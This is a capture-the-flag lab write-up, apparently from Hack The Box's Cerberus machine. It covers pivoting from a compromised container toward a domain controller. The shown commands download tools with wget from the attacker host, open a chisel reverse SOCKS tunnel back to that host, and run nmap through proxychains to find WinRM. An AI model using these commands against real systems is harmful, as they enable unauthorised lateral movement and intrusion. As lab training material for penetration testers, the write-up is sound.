InfoSec LAB

Cerberus_Pivoting

Created: 3 min read

Pivoting

The container host, icinga.cerberus.local, has been fully compromised, and post-compromise assessment has been made, which resulted a credential retrieval of the matthew user and the machine account

root@icinga:/dev/shm# ifconfig | grep -w inet
        inet 172.16.22.2  netmask 255.255.255.240  broadcast 172.16.22.15
        inet 127.0.0.1  netmask 255.0.0.0
 
root@icinga:/dev/shm# arp -a
dc.cerberus.local (172.16.22.1) at 00:15:5d:5f:e8:00 [ether] on eth0
 
root@icinga:/dev/shm# ip route
default via 172.16.22.1 dev eth0 onlink 
172.16.22.0/28 dev eth0 proto kernel scope link src 172.16.22.2

Considering the current container host’s network configurations, specifically its connection to the dc.cerberus.local host over the 172.16.22.0/28 network, establishing a tunnel is necessary to reach the internal NIC of the dc.cerberus.local host. I will be using chisel for this

Reverse Socks Proxy

root@icinga:/dev/shm# wget -q http://10.10.14.4/chiselx64 ; chmod 755 /dev/shm/chiselx64

Delivery complete

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ chisel server -p 55555 --reverse -v
2024/01/17 13:12:33 server: Reverse tunnelling enabled
2024/01/17 13:12:33 server: Fingerprint uoasuwy7df65gfzvAiwoSIqrOMsR8i6iVyGhNEHqa0A=
2024/01/17 13:12:33 server: Listening on http://0.0.0.0:55555

Starting a chisel server on the Kali port 55555

From Kali, I need append the configured reverse socks proxy at the bottom of the /etc/proxychains4.conf file This configuration would allow me to reach other internal hosts

root@icinga:/dev/shm# ./chiselx64 client 10.10.14.4:55555 R:48823:socks &
[1] 21234
2024/01/17 12:14:53 client: Connecting to ws://10.10.14.4:55555
2024/01/17 12:14:53 client: Connected (Latency 27.0586ms)

The command above will bind the port 48823 of the icinga.cerberus.local host to the Kali’s socks proxy, effectively creating a reverse socks proxy

Connected Now that a reverse socks proxy has been established, I can reach any host from within the initial container(172.16.22.2)

Scanning

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ proxychains -q nmap 172.16.22.1          
starting nmap 7.94svn ( https://nmap.org ) at 2024-01-17 14:09 CET
stats: 0:02:00 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
connect scan timing: About 0.70% done
stats: 0:08:32 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
connect scan timing: About 3.30% done; ETC: 18:20 (4:02:44 remaining)
stats: 0:38:40 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
connect scan timing: About 15.30% done; ETC: 18:20 (3:32:46 remaining)
stats: 2:19:23 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
connect scan timing: About 55.40% done; ETC: 18:20 (1:52:01 remaining)
stats: 3:20:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
connect scan timing: About 79.70% done; ETC: 18:20 (0:50:59 remaining)
stats: 3:45:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
connect scan timing: About 89.50% done; ETC: 18:20 (0:26:22 remaining)

Despite of the created reverse socks proxy, scanning is taking very slow. I will opt out to another option

root@icinga:/dev/shm# wget -q http://10.10.14.4/nmap ; chmod 755 /dev/shm/nmap

uploading the statically-compiled nmap to the icinga.cerberus.local host This way, it’s library-free and can just scan the DC host directly

root@icinga:/dev/shm# ./nmap -T4 -p- 172.16.22.1
starting nmap 6.49beta1 ( http://nmap.org ) at 2024-01-17 17:08 UTC
Unable to find nmap-services!  Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
 
Nmap scan report for DC.cerberus.local (172.16.22.1)
cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.00064s latency).
not shown: 65534 filtered ports
PORT     STATE SERVICE
5985/tcp open  unknown
mac address: 00:15:5D:5F:E8:00 (Unknown)
 
nmap done: 1 IP address (1 host up) scanned in 1210.58 seconds

WinRM service is up and running

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ proxychains -q nmap -Pn -p5985 172.16.22.1               
starting nmap 7.94svn ( https://nmap.org ) at 2024-01-17 17:51 CET
Nmap scan report for dc (172.16.22.1)
Host is up (0.086s latency).
 
PORT     STATE SERVICE
5985/tcp open  wsman
 
nmap done: 1 IP address (1 host up) scanned in 0.11 seconds

Confirming it from Kali via the created reverse socks proxy I will test out the credential of the matthew user against the WinRM service

Interactive Graph View

Backlinks